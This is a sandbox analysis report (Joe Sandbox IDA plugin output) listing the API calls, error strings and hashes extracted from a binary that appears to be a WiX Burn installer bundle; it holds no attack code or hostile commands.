                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _memcpy_s
                                                            • String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
                                                            • API String ID: 2001391462-1605196437
                                                            • Opcode ID: 2dbd468593767580b4b6d955a452462c45a4e2ea9c7a6782e327eb6c18786fe7
                                                            • Instruction ID: 7e47fceec204c432216a4353726146ae09f0584bdf0450913d5470be753d002d
                                                            • Opcode Fuzzy Hash: 2dbd468593767580b4b6d955a452462c45a4e2ea9c7a6782e327eb6c18786fe7
                                                            • Instruction Fuzzy Hash: D611C8325C0214BBDB15296C9C86DD63A14FF16721F04C071F958ED39ADA72C910D6E3
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 00879E38
                                                            Strings
                                                            • Failed get file version., xrefs: 00879E78
                                                            • Failed to set variable., xrefs: 00879E97
                                                            • File search: %ls, did not find path: %ls, xrefs: 00879EA3
                                                            • Failed to format path string., xrefs: 00879E43
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open@16
                                                            • String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
                                                            • API String ID: 3613110473-2458530209
                                                            • Opcode ID: 9859e7722df73aaba8786bce492d8852dc86102cfc63eb8ffabfb7e769d3c6fa
                                                            • Instruction ID: ad5bcc3fb460584ac66b3a47b8fd63f972b94e45c58599bef3d2169d3310bb16
                                                            • Opcode Fuzzy Hash: 9859e7722df73aaba8786bce492d8852dc86102cfc63eb8ffabfb7e769d3c6fa
                                                            • Instruction Fuzzy Hash: 39118137D40129BFCB02AAD88C42CEEBB78FF14754B108166F918E6325D6719E109B91
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,00888E17,0000001A,00000000,?,00000000,00000000), ref: 00888258
                                                            • GetLastError.KERNEL32(?,?,00888E17,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00888262
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateCreateErrorKnownLastProcessWell
                                                            • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
                                                            • API String ID: 2186923214-2110050797
                                                            • Opcode ID: 44f5bd09966183ecabb757a025d361b2a6facb25b6fa499b831cd1e9d440d77e
                                                            • Instruction ID: 7a327139ceaf3d517b01a3c8a6732d865d922ba61421664aaf142973e1003456
                                                            • Opcode Fuzzy Hash: 44f5bd09966183ecabb757a025d361b2a6facb25b6fa499b831cd1e9d440d77e
                                                            • Instruction Fuzzy Hash: 5001C232546A35EBD62176994C06E9B6A68FF81B70F11402AFD14FB240EFB4CD4056E6
                                                            APIs
                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 0089DDCE
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089DDF8
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0089DFC8,00000000,?,?,?,?,00000000), ref: 0089DE00
                                                            Strings
                                                            • Failed while waiting for download., xrefs: 0089DE2E
                                                            • bitsengine.cpp, xrefs: 0089DE24
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessageMultipleObjectsPeekWait
                                                            • String ID: Failed while waiting for download.$bitsengine.cpp
                                                            • API String ID: 435350009-228655868
                                                            • Opcode ID: d366241b75be28edd4deb29a89ebb478be6767a553ca67d3851e6a99c0db6e51
                                                            • Instruction ID: 91debb4ca5374b0e130ef9e432ab925c5daca8cf094835b63d19e11a94e457e5
                                                            • Opcode Fuzzy Hash: d366241b75be28edd4deb29a89ebb478be6767a553ca67d3851e6a99c0db6e51
                                                            • Instruction Fuzzy Hash: 2A11CA73A4533577DA2066A99D49EDFBB9CFB04725F040225FD05FB280D6649D0086E9
                                                            APIs
                                                            • GetComputerNameW.KERNEL32(?,00000010), ref: 00875F5C
                                                            • GetLastError.KERNEL32 ref: 00875F66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ComputerErrorLastName
                                                            • String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
                                                            • API String ID: 3560734967-484636765
                                                            • Opcode ID: 1208f6522eeace77e1c7ffc2335be8fd6cf23b45e3c62c40fc8fee7c194925c3
                                                            • Instruction ID: ce957c911bf5e4e785cfcb7f12c2faaf705043c48a83301102cf0453e54ed9a0
                                                            • Opcode Fuzzy Hash: 1208f6522eeace77e1c7ffc2335be8fd6cf23b45e3c62c40fc8fee7c194925c3
                                                            • Instruction Fuzzy Hash: 7611E933A41928ABC711EAA49C45ADEB7E8FB08720F114116FD04FB380DEB5EE0446E6
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 008767E3
                                                            • GetLastError.KERNEL32 ref: 008767ED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastPathTemp
                                                            • String ID: Failed to get temp path.$Failed to set variant value.$variable.cpp
                                                            • API String ID: 1238063741-2915113195
                                                            • Opcode ID: f0c58d35212be8c94c63c21f41d3bbacfab74736c72aff4c36539f93e3f3564e
                                                            • Instruction ID: 914202b4cbbcfd9e0b3f16faa430c6341a476605588448c91f15c2d6d36255c9
                                                            • Opcode Fuzzy Hash: f0c58d35212be8c94c63c21f41d3bbacfab74736c72aff4c36539f93e3f3564e
                                                            • Instruction Fuzzy Hash: FF010872E416296BD620AB545C06FAE7758FB04710F104275FD18F7381FA74DD048AD7
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?), ref: 00875EA6
                                                              • Part of subcall function 008B0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00875EB2,00000000), ref: 008B0AE0
                                                              • Part of subcall function 008B0ACC: GetProcAddress.KERNEL32(00000000), ref: 008B0AE7
                                                              • Part of subcall function 008B0ACC: GetLastError.KERNEL32(?,?,?,00875EB2,00000000), ref: 008B0AFE
                                                              • Part of subcall function 008B3D1F: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 008B3D4C
                                                            Strings
                                                            • variable.cpp, xrefs: 00875ED0
                                                            • Failed to get 64-bit folder., xrefs: 00875EF0
                                                            • Failed to set variant value., xrefs: 00875F0A
                                                            • Failed to get shell folder., xrefs: 00875EDA
                                                            Similarity
                                                            • API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
                                                            • String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
                                                            • API String ID: 2084161155-3906113122
                                                            • Opcode ID: 81da14611abeba8b516120bd915c6c3ec6a3c5d8a440db35766701bd3d6824e3
                                                            • Instruction ID: 972843d29ccf5b9d062accaed6ac5e8684691d674574d89be3ff0c34bbead60f
                                                            • Opcode Fuzzy Hash: 81da14611abeba8b516120bd915c6c3ec6a3c5d8a440db35766701bd3d6824e3
                                                            • Instruction Fuzzy Hash: 8F016532941629BBDF12A794CC06BDE7A68FB00761F108165F808F6294DFB4DE409BD2
                                                            APIs
                                                              • Part of subcall function 008B4440: FindFirstFileW.KERNEL32(0089923A,?,00000100,00000000,00000000), ref: 008B447B
                                                              • Part of subcall function 008B4440: FindClose.KERNEL32(00000000), ref: 008B4487
                                                            • SetFileAttributesW.KERNEL32(0089923A,00000080,00000000,0089923A,000000FF,00000000,?,?,0089923A), ref: 008B4182
                                                            • GetLastError.KERNEL32(?,?,0089923A), ref: 008B418C
                                                            • DeleteFileW.KERNEL32(0089923A,00000000,0089923A,000000FF,00000000,?,?,0089923A), ref: 008B41AC
                                                            • GetLastError.KERNEL32(?,?,0089923A), ref: 008B41B6
                                                            Strings
                                                            Similarity
                                                            • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 3967264933-2967768451
                                                            • Opcode ID: 7065a24d764b1251cabfb08f379f0d6b97c0167324767f4fa2509697cac924ad
                                                            • Instruction ID: a05b7e26dec464464f9c5501c7878a6e7038bd97b08583768da0d27d9c7c2b85
                                                            • Opcode Fuzzy Hash: 7065a24d764b1251cabfb08f379f0d6b97c0167324767f4fa2509697cac924ad
                                                            • Instruction Fuzzy Hash: C7012272E4163AA7D7311AAE8C06BAB7EA8FF20760F010320FC14EA382D7618D9081D1
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0089DA1A
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0089DA5F
                                                            • SetEvent.KERNEL32(?,?,?,?), ref: 0089DA73
                                                            Strings
                                                            • Failure while sending progress during BITS job modification., xrefs: 0089DA4E
                                                            • Failed to get state during job modification., xrefs: 0089DA33
                                                            Similarity
                                                            • API ID: CriticalSection$EnterEventLeave
                                                            • String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
                                                            • API String ID: 3094578987-1258544340
                                                            • Opcode ID: 2d76847914abf25384dbb0932d04e5f767548d2017f26b12865b8f360685fcde
                                                            • Instruction ID: 6a0c80ec2737571b2657a29796968f28ab6082355dfdaeadf4c73783979e1fd1
                                                            • Opcode Fuzzy Hash: 2d76847914abf25384dbb0932d04e5f767548d2017f26b12865b8f360685fcde
                                                            • Instruction Fuzzy Hash: 41019272A05725BFCB11EB59C859AAEB7ACFF14321B004246E805E7700D770ED14CAD9
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,0089DDEE), ref: 0089DC92
                                                            • LeaveCriticalSection.KERNEL32(00000008,?,0089DDEE), ref: 0089DCD7
                                                            • SetEvent.KERNEL32(?,?,0089DDEE), ref: 0089DCEB
                                                            Strings
                                                            • Failed to get BITS job state., xrefs: 0089DCAB
                                                            • Failure while sending progress., xrefs: 0089DCC6
                                                            Similarity
                                                            • API ID: CriticalSection$EnterEventLeave
                                                            • String ID: Failed to get BITS job state.$Failure while sending progress.
                                                            • API String ID: 3094578987-2876445054
                                                            • Opcode ID: 6fdf6010a00d37c42ec210369214d0b9f61ac785bc7c45d5bf22724be98f638e
                                                            • Instruction ID: 362ec5e57d134e30b09c6404629046217358ca337884e73d3b97e1f7089d83e9
                                                            • Opcode Fuzzy Hash: 6fdf6010a00d37c42ec210369214d0b9f61ac785bc7c45d5bf22724be98f638e
                                                            • Instruction Fuzzy Hash: 53012432A01725BFCB22AB59D849A9EB7ACFF04324B004256F904D7700DBB0ED04CBD8
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,0089DF52,?,?,?,?,?,?,00000000,00000000), ref: 0089D802
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0089DF52,?,?,?,?,?,?,00000000,00000000), ref: 0089D80D
                                                            • GetLastError.KERNEL32(?,0089DF52,?,?,?,?,?,?,00000000,00000000), ref: 0089D81A
                                                            Strings
                                                            • Failed to create BITS job complete event., xrefs: 0089D848
                                                            • bitsengine.cpp, xrefs: 0089D83E
                                                            Similarity
                                                            • API ID: CreateCriticalErrorEventInitializeLastSection
                                                            • String ID: Failed to create BITS job complete event.$bitsengine.cpp
                                                            • API String ID: 3069647169-3441864216
                                                            • Opcode ID: cffd1dedc35a47cbeb7c82f6da7ae7ba807bfdc5cf26d96ddbb88fe1c2d27816
                                                            • Instruction ID: c51e8573c67716095b45f5ebfb7c43f62c2ac138adbf1ce6c491257d17ec5e89
                                                            • Opcode Fuzzy Hash: cffd1dedc35a47cbeb7c82f6da7ae7ba807bfdc5cf26d96ddbb88fe1c2d27816
                                                            • Instruction Fuzzy Hash: E20152769417266BC710AB59DC05A86BBA8FF09760B054226FD18E7741D7B09800CBE5
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00887040,000000B8,00000000,?,00000000,75C0B390), ref: 0087D4B7
                                                            • InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0087D4C6
                                                            • LeaveCriticalSection.KERNEL32(000000D0,?,00887040,000000B8,00000000,?,00000000,75C0B390), ref: 0087D4DB
                                                            Strings
                                                            • userexperience.cpp, xrefs: 0087D4F4
                                                            • Engine active cannot be changed because it was already in that state., xrefs: 0087D4FE
                                                            Similarity
                                                            • API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
                                                            • String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
                                                            • API String ID: 3376869089-1544469594
                                                            • Opcode ID: 520267670a59ae8f674fe034ebff4524d91be42899fecf3b3f819873b9dbd4ba
                                                            • Instruction ID: 78b5c309dfc609c85fbb3faac549a392db2991a6c88f09c00d3d8c6613d9e8d8
                                                            • Opcode Fuzzy Hash: 520267670a59ae8f674fe034ebff4524d91be42899fecf3b3f819873b9dbd4ba
                                                            • Instruction Fuzzy Hash: B6F0C232340708AF97205EAADC84D9777BCFF95761300852AF615D7250DBB4EC098770
                                                            APIs
                                                            • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 008B1CB3
                                                            • GetLastError.KERNEL32(?,008749DA,00000001,?,?,00874551,?,?,?,?,00875466,?,?,?,?), ref: 008B1CC2
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressErrorLastProc
                                                            • String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
                                                            • API String ID: 199729137-398595594
                                                            • Opcode ID: 81dd7b1c6f43bd29e2fa79530ff4dc27572ad97a416bf0a604e8e8af6d35d1b2
                                                            • Instruction ID: f9c7cabae1820e99e62af980508e819a3f51ed9ef599c13658b0bd70be6861b6
                                                            • Opcode Fuzzy Hash: 81dd7b1c6f43bd29e2fa79530ff4dc27572ad97a416bf0a604e8e8af6d35d1b2
                                                            • Instruction Fuzzy Hash: D701F237A8163693CA2126A96C3DB966B40FB20BA1F460233AD11EF360DB34DC40C6D6
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008A490E,00000000,?,008A48AE,00000000,008D7F08,0000000C,008A4A05,00000000,00000002), ref: 008A497D
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008A4990
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,008A490E,00000000,?,008A48AE,00000000,008D7F08,0000000C,008A4A05,00000000,00000002), ref: 008A49B3
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 27125ae6520ac513ea4d305c3a7dd0665d33e94fae0c7e95807378604209ee3a
                                                            • Instruction ID: 1c807282d4dc7abeac8da2da680a10ad37bdc97bcadeb61fd3efc0777e65c5e7
                                                            • Opcode Fuzzy Hash: 27125ae6520ac513ea4d305c3a7dd0665d33e94fae0c7e95807378604209ee3a
                                                            • Instruction Fuzzy Hash: 29F03C30A10608BBDF11AF94DC69BAEBFA8FF48711F444269F805E2260CBB54951CA95
                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 008893C9
                                                              • Part of subcall function 008B56CF: GetLastError.KERNEL32(?,?,0088933A,?,00000003,00000000,?), ref: 008B56EE
                                                            Strings
                                                            • cache.cpp, xrefs: 008893ED
                                                            • Failed to find expected public key in certificate chain., xrefs: 0088938A
                                                            • Failed to read certificate thumbprint., xrefs: 008893BD
                                                            • Failed to get certificate public key identifier., xrefs: 008893F7
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
                                                            • API String ID: 1452528299-3408201827
                                                            • Opcode ID: e41b1b1d20677b933c312a3e105d34fee39d5b913f7dd6d862dcec52d0b5b4a9
                                                            • Instruction ID: 9a2ff790156f75a8dd6637ecb70a7c3f26eee55c964c8c7ef2c777ee299a9943
                                                            • Opcode Fuzzy Hash: e41b1b1d20677b933c312a3e105d34fee39d5b913f7dd6d862dcec52d0b5b4a9
                                                            • Instruction Fuzzy Hash: 41414072A00619AFDB10EAA8C841EAEB7B8FB08714F055129FA55F7391D674ED00CBA1
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 008721F2
                                                            • GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 008721FE
                                                              • Part of subcall function 00873BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BDB
                                                              • Part of subcall function 00873BD3: HeapSize.KERNEL32(00000000,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BE2
                                                            Strings
                                                            Similarity
                                                            • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                            • String ID: strutil.cpp
                                                            • API String ID: 3662877508-3612885251
                                                            • Opcode ID: 28a9c9869225b26a2a91e72167b59888ec4a0c56873c6261dc08c9d2f8242765
                                                            • Instruction ID: ff45cf0fbbb943b8991bd45daeab311fd12e8e17828df819b37ab2b196a0380d
                                                            • Opcode Fuzzy Hash: 28a9c9869225b26a2a91e72167b59888ec4a0c56873c6261dc08c9d2f8242765
                                                            • Instruction Fuzzy Hash: CC314E3262022AABD7208EA5CC44A6BBB95FF15774B118324FD1DDB2AAE771CC4097D1
APIs
  • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
• RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 008B95D5
• RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 008B9610
• RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 008B962C
• RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 008B9639
• RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 008B9646
  • Part of subcall function 008B0FD5: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,008B95C2,00000001), ref: 008B0FED
Similarity
• API ID: Close$InfoOpenQuery
• String ID:
• API String ID: 796878624-0
APIs
• lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00878BC8,0087972D,?,0087972D,?,?,0087972D,?,?), ref: 00878A27
• lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00878BC8,0087972D,?,0087972D,?,?,0087972D,?,?), ref: 00878A2F
• CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,00878BC8,0087972D,?,0087972D,?), ref: 00878A7E
• CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00878BC8,0087972D,?,0087972D,?), ref: 00878AE0
• CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00878BC8,0087972D,?,0087972D,?), ref: 00878B0D
Similarity
• API ID: CompareString$lstrlen
• String ID:
• API String ID: 1657112622-0
APIs
• EnterCriticalSection.KERNEL32(008753BD,WixBundleOriginalSource,?,?,0088A623,840F01E8,WixBundleOriginalSource,?,008DAA90,?,00000000,00875445,00000001,?,?,00875445), ref: 008774C3
• LeaveCriticalSection.KERNEL32(008753BD,008753BD,00000000,00000000,?,?,0088A623,840F01E8,WixBundleOriginalSource,?,008DAA90,?,00000000,00875445,00000001,?), ref: 0087752A
Strings
• WixBundleOriginalSource, xrefs: 008774BF
• Failed to get value as string for variable: %ls, xrefs: 00877519
• Failed to get value of variable: %ls, xrefs: 008774FD
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
• API String ID: 3168844106-30613933
APIs
• CloseHandle.KERNEL32(?,00000000,?,00000000,?,0089D148,00000000), ref: 0089D16D
• CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0089D148,00000000), ref: 0089D179
• CloseHandle.KERNEL32(008BB518,00000000,?,00000000,?,0089D148,00000000), ref: 0089D186
• CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0089D148,00000000), ref: 0089D193
• UnmapViewOfFile.KERNEL32(008BB4E8,00000000,?,0089D148,00000000), ref: 0089D1A2
Similarity
• API ID: CloseHandle$FileUnmapView
• String ID:
• API String ID: 260491571-0
APIs
• SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 008B8820
• GetLastError.KERNEL32 ref: 008B882A
Similarity
• API ID: Time$ErrorFileLastSystem
• String ID: clbcatq.dll$timeutil.cpp
• API String ID: 2781989572-961924111
APIs
• VariantInit.OLEAUT32(000002C0), ref: 008B36E6
• SysAllocString.OLEAUT32(?), ref: 008B36F6
• VariantClear.OLEAUT32(?), ref: 008B37D5
Similarity
• API ID: Variant$AllocClearInitString
• String ID: xmlutil.cpp
• API String ID: 2213243845-1270936966
APIs
• RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00898E1B), ref: 008B0EAA
• RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00898E1B,00000000), ref: 008B0EC8
• RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,00898E1B,00000000,00000000,00000000), ref: 008B0F1E
Similarity
• API ID: Enum$InfoQuery
• String ID: regutil.cpp
• API String ID: 73471667-955085611
APIs
  • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
• RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,00898E57,00000000,00000000), ref: 00898BD4
Strings
• Failed to ensure there is space for related bundles., xrefs: 00898B87
• Failed to open uninstall key for potential related bundle: %ls, xrefs: 00898B43
• Failed to initialize package from related bundle id: %ls, xrefs: 00898BBA
Similarity
• API ID: CloseOpen
• String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
• API String ID: 47109696-1717420724
APIs
• GetProcessHeap.KERNEL32(00000000,00000000,80004005,00000000,00000000,00000100,?,00871474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008713B8), ref: 00873B33
• HeapReAlloc.KERNEL32(00000000,?,00871474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008713B8,000001C7,00000100,?,80004005,00000000), ref: 00873B3A
  • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
  • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
  • Part of subcall function 00873BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BDB
  • Part of subcall function 00873BD3: HeapSize.KERNEL32(00000000,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BE2
• _memcpy_s.LIBCMT ref: 00873B86
Similarity
• API ID: Heap$Process$AllocAllocateSize_memcpy_s
• String ID: memutil.cpp
• API String ID: 3406509257-2429405624
APIs
• GetLastError.KERNEL32 ref: 008B8991
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008B89B9
• GetLastError.KERNEL32 ref: 008B89C3
Similarity
• API ID: ErrorLastTime$FileSystem
• String ID: inetutil.cpp
• API String ID: 1528435940-2900720265
APIs
  • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
• RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00883FB5,feclient.dll,?,00000000,?,?,?,00874B12), ref: 00883B42
  • Part of subcall function 008B10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008B112B
  • Part of subcall function 008B10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008B1163
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen
